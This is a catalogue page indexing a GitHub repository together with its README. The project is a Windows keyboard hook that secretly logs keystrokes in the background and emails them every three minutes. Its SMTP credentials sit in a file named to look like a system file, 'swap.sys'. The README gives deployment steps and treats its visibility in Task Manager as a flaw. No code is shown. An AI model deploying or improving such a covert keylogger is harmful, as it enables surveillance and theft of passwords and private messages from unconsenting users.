Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/leyanpan/Keyboard-Hooker
A keyboard hook that sends recorded keystrokes on windows via email
https://github.com/leyanpan/Keyboard-Hooker
Last synced: 3 days ago
JSON representation
A keyboard hook that sends recorded keystrokes on windows via email
- Host: GitHub
- URL: https://github.com/leyanpan/Keyboard-Hooker
- Owner: leyanpan
- Created: 2016-09-15T12:30:24.000Z (about 8 years ago)
- Default Branch: master
- Last Pushed: 2016-09-22T15:48:24.000Z (about 8 years ago)
- Last Synced: 2024-08-02T05:06:36.085Z (3 months ago)
- Language: C++
- Homepage:
- Size: 26.3 MB
- Stars: 2
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Hook
A keyboard hooker that sends keystroke on windows via email# Usage
1. Create a file in the same directory named swap.sys
2. Compile the project (you would need Visual Studio) or run the pre-compiled exe file in release. The program will run in background.
3. The program will send a mail every 3 minutes if there is any stroke recorded. Check your mailbox regularly!
4. To stop, enter Ctrl + `, it will stop automatically.#File format
The swap.sys should be organized in the following format:1st Line: The server that the mail request should be sent to e.g. smtp.163.com
2nd Line: Mail address you want to use e.g. [email protected]
3rd Line: Mailbox password e.g. 123456
The file should contain the following for the example:
smtp.163.com
123456
The mails will be sent from and to the mailbox entered.
# Problems
The process is still visible through task manager.
And there should be a lot of problems to solve!